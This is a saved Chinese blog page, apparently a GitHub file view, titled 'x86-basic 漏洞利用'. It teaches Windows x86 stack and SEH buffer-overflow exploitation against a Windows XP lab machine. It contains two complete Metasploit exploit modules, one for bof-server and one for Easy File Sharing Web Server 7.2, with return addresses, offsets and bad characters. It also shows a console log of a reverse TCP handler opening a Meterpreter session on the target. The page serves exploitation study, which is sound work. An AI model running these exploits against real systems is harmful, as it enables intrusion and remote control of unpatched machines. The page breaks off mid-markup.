Cool-Y.github.io/2019/07/10/x86basic/index.html
2021-05-20 19:39:04 +08:00

1270 lines
77 KiB
HTML
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<!DOCTYPE html>
<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">
<script src="/lib/pace/pace.min.js?v=1.0.2"></script>
<link href="/lib/pace/pace-theme-center-atom.min.css?v=1.0.2" rel="stylesheet">
<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
<link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
<link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
<link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
<link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
<link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
<meta name="keywords" content="二进制,Windows,漏洞,">
<link rel="alternate" href="/atom.xml" title="混元霹雳手" type="application/atom+xml">
<meta name="description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍从最基础的、没有开启任何保护的漏洞程序入手然后开启GS最后通过rop绕过DEP。">
<meta name="keywords" content="二进制,Windows,漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="x86-basic 漏洞利用">
<meta property="og:url" content="https://cool-y.github.io/2019/07/10/x86basic/index.html">
<meta property="og:site_name" content="混元霹雳手">
<meta property="og:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍从最基础的、没有开启任何保护的漏洞程序入手然后开启GS最后通过rop绕过DEP。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/pwn/%E6%8D%95%E8%8E%B71.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/pwn/%E5%9B%BE%E7%89%871.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/pwn/%E5%9B%BE%E7%89%872.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/pwn/%E5%9B%BE%E7%89%873.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/pwn/%E5%9B%BE%E7%89%874.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/pwn/%E5%9B%BE%E7%89%875.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/pwn/%E5%9B%BE%E7%89%876.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/pwn/%E5%9B%BE%E7%89%877.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/pwn/%E5%9B%BE%E7%89%878.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/pwn/%E5%9B%BE%E7%89%879.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/pwn/%E5%9B%BE%E7%89%8710.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/pwn/%E5%9B%BE%E7%89%8711.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/pwn/231.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/pwn/%E6%8D%9511%E8%8E%B7.png">
<meta property="og:updated_time" content="2021-04-10T13:51:32.349Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="x86-basic 漏洞利用">
<meta name="twitter:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍从最基础的、没有开启任何保护的漏洞程序入手然后开启GS最后通过rop绕过DEP。">
<meta name="twitter:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png">
<script type="text/javascript" id="hexo.configurations">
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
scheme: 'Muse',
version: '5.1.4',
sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
fancybox: true,
tabs: true,
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
duoshuo: {
userId: '0',
author: '博主'
},
algolia: {
applicationID: '',
apiKey: '',
indexName: '',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
</script>
<link rel="canonical" href="https://cool-y.github.io/2019/07/10/x86basic/">
<title>x86-basic 漏洞利用 | 混元霹雳手</title>
</head>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
<div class="container sidebar-position-left page-post-detail">
<div class="headband"></div>
<header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-wrapper">
<div class="site-meta ">
<div class="custom-logo-site-title">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<span class="site-title">混元霹雳手</span>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<p class="site-subtitle">Battle⚔ 2 the world🌎</p>
</div>
<div class="site-nav-toggle">
<button>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
</button>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section">
<i class="menu-item-icon fa fa-fw fa-home"></i> <br>
首页
</a>
</li>
<li class="menu-item menu-item-about">
<a href="/about/" rel="section">
<i class="menu-item-icon fa fa-fw fa-user"></i> <br>
关于
</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags/" rel="section">
<i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
标签
</a>
</li>
<li class="menu-item menu-item-categories">
<a href="/categories/" rel="section">
<i class="menu-item-icon fa fa-fw fa-th"></i> <br>
分类
</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section">
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
归档
</a>
</li>
<li class="menu-item menu-item-bookmarks">
<a href="/bookmarks/" rel="section">
<i class="menu-item-icon fa fa-fw fa-map"></i> <br>
书签
</a>
</li>
<li class="menu-item menu-item-album">
<a href="/album/" rel="section">
<i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br>
相簿
</a>
</li>
</ul>
</nav>
</div>
</header>
<main id="main" class="main">
<div class="main-inner">
<div class="content-wrap">
<div id="content" class="content">
<div id="posts" class="posts-expand">
<article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
<div class="post-block">
<link itemprop="mainEntityOfPage" href="https://cool-y.github.io/2019/07/10/x86basic/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="name" content="Cool-Y">
<meta itemprop="description" content>
<meta itemprop="image" content="/images/avatar.png">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="混元霹雳手">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">x86-basic 漏洞利用</h1>
<div class="post-meta">
<span class="post-time">
<span class="post-meta-item-icon">
<i class="fa fa-calendar-o"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-10T17:00:36+08:00">
2019-07-10
</time>
</span>
<span class="post-category">
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-folder-o"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Pwn/" itemprop="url" rel="index">
<span itemprop="name">Pwn</span>
</a>
</span>
</span>
<span id="/2019/07/10/x86basic/" class="leancloud_visitors" data-flag-title="x86-basic 漏洞利用">
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-eye"></i>
</span>
<span class="post-meta-item-text">阅读次数&#58;</span>
<span class="leancloud-visitors-count"></span>
</span>
<div class="post-wordcount">
<span class="post-meta-item-icon">
<i class="fa fa-file-word-o"></i>
</span>
<span title="字数统计">
2.2k 字
</span>
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-clock-o"></i>
</span>
<span title="阅读时长">
11 分钟
</span>
</div>
<div class="post-description">
这部分是对Window x86平台下的几个典型漏洞利用方式的介绍从最基础的、没有开启任何保护的漏洞程序入手然后开启GS最后通过rop绕过DEP。
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h1 id="0x00-漏洞利用开发简介"><a href="#0x00-漏洞利用开发简介" class="headerlink" title="0x00 漏洞利用开发简介"></a>0x00 漏洞利用开发简介</h1><p>1需要什么</p>
<ul>
<li>Immunity Debugger -<a href="http://debugger.immunityinc.com/ID_register.py" target="_blank" rel="noopener">Download</a></li>
<li>Mona.py -<a href="https://github.com/corelan/mona" target="_blank" rel="noopener">Download</a></li>
<li>Metasploit框架-<a href="https://www.metasploit.com/" target="_blank" rel="noopener">下载</a></li>
<li>靶机Windows XP sp3</li>
</ul>
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png" alt></p>
<ul>
<li>函数调用与栈:调用、返回</li>
<li>寄存器与函数栈帧ESP、EBP</li>
<li>函数栈帧:局部变量、栈帧状态值、函数返回地址</li>
<li>函数调用约定与相关指令:参数传递方式、参数入栈顺序、恢复堆栈平衡的操作</li>
</ul>
<p>2函数调用的汇编过程</p>
<ol>
<li><p>示例程序</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">charname[] = <span class="string">"1234567"</span>;</span><br><span class="line">voidfunc(<span class="keyword">int</span> a, <span class="keyword">int</span> b, <span class="keyword">int</span> c)</span><br><span class="line">&#123;</span><br><span class="line"> charbuf[<span class="number">8</span>];</span><br><span class="line"> <span class="built_in">strcpy</span>(buf, name);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>汇编过程</p>
</li>
</ol>
<ul>
<li>PUSH c, PUSH b, PUSH a</li>
<li>CALL address of func【保存返回地址跳转】</li>
<li>MOV ebp, esp</li>
<li>PUSH ebp</li>
<li>SUB esp, 0x40</li>
<li>创建局部变量4个字节为一组</li>
<li>do something</li>
<li>add esp, 0x40</li>
<li>pop ebp</li>
<li>RETN【弹出返回地址跳转】</li>
</ul>
<ol start="3">
<li>栈帧结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/pwn/%E6%8D%95%E8%8E%B71.png" alt></li>
</ol>
<h1 id="0x01-简单栈溢出"><a href="#0x01-简单栈溢出" class="headerlink" title="0x01 简单栈溢出"></a>0x01 简单栈溢出</h1><blockquote>
<p><strong>目标程序:</strong><br><a href="http://redstack.net/blog/static/uploads/2008/01/bof-server.c" target="_blank" rel="noopener">bof-server source code</a><br><a href="http://redstack.net/blog/wp-content/uploads/2008/01/bof-server.exe" target="_blank" rel="noopener">bof-server binary for Windows</a><br><strong>usage:</strong><br>服务端<br><code>bof-server.exe 4242</code><br>客户端<br><code>telnet localhost 4242</code><br><code>version</code><br><code>bof-server v0.01</code><br><code>quit</code></p>
</blockquote>
<h2 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/pwn/%E5%9B%BE%E7%89%871.png" alt></p>
<p><strong>产生崩溃</strong><br>将输出的1024个A发送给靶机程序<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c &quot;print(&apos;A&apos; * 1024)&quot;</span><br><span class="line">telnet 192.168.64.138 4242</span><br></pre></td></tr></table></figure></p>
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/pwn/%E5%9B%BE%E7%89%872.png" alt></p>
<h2 id="关闭防御措施"><a href="#关闭防御措施" class="headerlink" title="关闭防御措施"></a>关闭防御措施</h2><p>使用<strong>PESecurity</strong>检查可执行文件本身的防御措施开启情况<br>注意设置Set-ExecutionPolicyUnrestricted</p>
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/pwn/%E5%9B%BE%E7%89%873.png" alt></p>
<p><strong>ASLR和DEP</strong><br>ASLR在xp下不用考虑DEP可通过修改boot.ini中的nonexecute来完成AlwaysOff、OptOut<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/pwn/%E5%9B%BE%E7%89%874.png" alt></p>
<h2 id="整体的攻击流程"><a href="#整体的攻击流程" class="headerlink" title="整体的攻击流程"></a>整体的攻击流程</h2><ol>
<li>任意非00的指令覆盖buffer和EBP</li>
<li>从程序已经加载的dll中获取他们的jmp esp指令地址。</li>
<li>使用jmp esp的指令地址覆盖ReturnAddress</li>
<li>从下一行开始填充Shellcode<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/pwn/%E5%9B%BE%E7%89%875.png" alt></li>
</ol>
<h2 id="确定溢出点的位置"><a href="#确定溢出点的位置" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol>
<li><p>生成字符序列 <strong>pattern_create.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/pwn/%E5%9B%BE%E7%89%876.png" alt></p>
</li>
<li><p>发送给目标程序<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/pwn/%E5%9B%BE%E7%89%877.png" alt></p>
</li>
<li><p>计算偏移量 <strong>pattern_offset.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/pwn/%E5%9B%BE%E7%89%878.png" alt></p>
</li>
<li><p>确定payload结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/pwn/%E5%9B%BE%E7%89%879.png" alt></p>
</li>
</ol>
<h2 id="寻找jmp-esp跳板"><a href="#寻找jmp-esp跳板" class="headerlink" title="寻找jmp esp跳板"></a>寻找jmp esp跳板</h2><ol>
<li>OD附加进程看一下服务器加载了哪些模块<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/pwn/%E5%9B%BE%E7%89%8710.png" alt></li>
<li>查找JMP ESP指令的地址<br>在这里选择了ws2_32.dll作为对象通过Metasploit的msfbinscan进行搜索<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/pwn/%E5%9B%BE%E7%89%8711.png" alt></li>
</ol>
<h2 id="自动化攻击"><a href="#自动化攻击" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> =&gt; <span class="string">'Stack Based Buffer Overflow Example'</span>,</span><br><span class="line"> <span class="string">'Description'</span> =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string"> Stack Based Overflow Example Application Exploitation Module</span></span><br><span class="line"><span class="string"> &#125;</span>,</span><br><span class="line"> <span class="string">'Platform'</span> =&gt; <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Author'</span> =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line"> <span class="string">'Payload'</span> =&gt;</span><br><span class="line"> &#123;</span><br><span class="line"> <span class="string">'space'</span> =&gt; <span class="number">400</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> =&gt; <span class="string">"\x00\xff"</span></span><br><span class="line"> &#125;,</span><br><span class="line"> <span class="string">'Targets'</span> =&gt;</span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Windows XP SP3'</span>,</span><br><span class="line"> &#123;<span class="string">'Ret'</span> =&gt; <span class="number">0x71a22b53</span>, <span class="string">'Offset'</span> =&gt; <span class="number">520</span>&#125;</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"> <span class="string">'DisclosureDate'</span> =&gt; <span class="string">'2019-05-25'</span></span><br><span class="line"> ))</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line"> connect</span><br><span class="line"> buf = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line"> buf = buf + [target[<span class="string">'Ret'</span>]].pack(<span class="string">'V'</span>) + make_nops(<span class="number">20</span>) + payload.encoded</span><br><span class="line"> sock.put(buf)</span><br><span class="line"> handler</span><br><span class="line"> disconnect</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/bof_attack</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; set rport 1000</span><br><span class="line">rport =&gt; 1000</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:4444 -&gt; 192.168.31.114:1062) at 2019-07-10 16:38:51 +0800</span><br><span class="line"></span><br><span class="line">meterpreter &gt; ls</span><br><span class="line">Listing: C:\Documents and Settings\Administrator</span><br><span class="line">================================================</span><br><span class="line"></span><br><span class="line">Mode Size Type Last modified Name</span><br><span class="line">---- ---- ---- ------------- ----</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Application Data</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Cookies</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Favorites</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Local Settings</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 My Documents</span><br><span class="line">100666/rw-rw-rw- 1048576 fil 2019-05-14 09:54:43 +0800 NTUSER.DAT</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 NetHood</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 PrintHood</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Recent</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 SendTo</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Templates</span><br><span class="line">100777/rwxrwxrwx 26665 fil 2019-05-28 14:59:10 +0800 bof-server.exe</span><br><span class="line">100666/rw-rw-rw- 1024 fil 2019-05-14 09:54:43 +0800 ntuser.dat.LOG</span><br><span class="line">100666/rw-rw-rw- 178 fil 2019-05-14 09:54:43 +0800 ntuser.ini</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-29 10:49:26 +0800 vulnserver</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 「开始」菜单</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 桌面</span><br><span class="line"></span><br><span class="line">meterpreter &gt;</span><br></pre></td></tr></table></figure>
<hr>
<h1 id="0x02-基于SEH的栈溢出"><a href="#0x02-基于SEH的栈溢出" class="headerlink" title="0x02 基于SEH的栈溢出"></a>0x02 基于SEH的栈溢出</h1><blockquote>
<p><strong>目标程序</strong> Easy File Sharing Web Server 7.2</p>
<p><strong>漏洞点</strong><br>在处理请求时存在漏洞——一个恶意的请求头部HEAD或GET就可以引起缓冲区溢出从而改写SEH链的地址。</p>
<p><strong>利用seh</strong><br>填充物+nseh+ sehpop popretn指令序列地址+shellcode</p>
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png" alt></p>
</blockquote>
<h2 id="确定溢出点的位置-1"><a href="#确定溢出点的位置-1" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol>
<li>生成字符序列<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 10000 &gt; a.txt</span><br><span class="line">python -c &quot;print(&apos; HTTP/1.0\r\n\r\n&apos;)&quot; &gt; b.txt</span><br><span class="line">cat a.txt b.txt &gt; c.txt</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>删除cat造成的多余字符0x0a<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vim -bz.txt</span><br><span class="line"># In Vim</span><br><span class="line">:%!xxd</span><br><span class="line"># After editing, use the instruction below to save</span><br><span class="line">:%!xxd -r</span><br></pre></td></tr></table></figure></p>
<ol start="2">
<li>构造SEH链</li>
</ol>
<ul>
<li>将Easy File Sharing Web Server 7.2加载到ImmunityDebugger中并处于运行状态。</li>
<li>发送溢出字符序列</li>
<li>查看Easy File Sharing Web Server 7.2溢出地址<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/pwn/231.png" alt></li>
</ul>
<ol start="3">
<li>计算偏移量<br>计算catch块偏移量&amp;计算下一条SEH记录偏移量</li>
</ol>
<h2 id="寻找PPR"><a href="#寻找PPR" class="headerlink" title="寻找PPR"></a>寻找PPR</h2><ol>
<li>使用mona寻找<br>需要POP/POP/RET指令的地址来载入下一条SEH记录的地址并跳转到攻击载荷<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">!mona modules</span><br><span class="line">!mona seh</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h2 id="自动化攻击-1"><a href="#自动化攻击-1" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><ol>
<li><p>编写攻击脚本</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MetasploitModule</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Seh</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> =&gt; <span class="string">'Easy File Sharing HTTP Server 7.2 SEH Overflow'</span>,</span><br><span class="line"> <span class="string">'Description'</span> =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string"> This Module Demonstrate SEH based overflow example</span></span><br><span class="line"><span class="string"> &#125;</span>,</span><br><span class="line"> <span class="string">'Author'</span> =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line"> <span class="string">'Payload'</span> =&gt;</span><br><span class="line"> &#123;</span><br><span class="line"> <span class="string">'Space'</span> =&gt; <span class="number">390</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> =&gt; <span class="string">"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"</span></span><br><span class="line"> &#125;,</span><br><span class="line"> <span class="string">'Platform'</span> =&gt; <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Targets'</span> =&gt;</span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Easy File Sharing 7.2 HTTP'</span>,</span><br><span class="line"> &#123;</span><br><span class="line"> <span class="string">'Ret'</span> =&gt; <span class="number">0x10022fd7</span>,</span><br><span class="line"> <span class="string">'Offset'</span> =&gt; <span class="number">4061</span></span><br><span class="line"> &#125;</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"> <span class="string">'DisclosureDate'</span> =&gt; <span class="string">'2019-01-16'</span>,</span><br><span class="line"> ))</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line"> connect</span><br><span class="line"> weapon = <span class="string">"HEAD "</span></span><br><span class="line"> weapon &lt;&lt; make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line"> weapon &lt;&lt; generate_seh_record(target[<span class="string">'Ret'</span>])</span><br><span class="line"> weapon &lt;&lt; make_nops(<span class="number">20</span>)</span><br><span class="line"> weapon &lt;&lt; payload.encoded</span><br><span class="line"> weapon &lt;&lt; <span class="string">" HTTP/1.0\r\n\r\n"</span></span><br><span class="line"> sock.put(weapon)</span><br><span class="line"> handler</span><br><span class="line"> disconnect</span><br><span class="line"> <span class="keyword">end</span></span><br><span 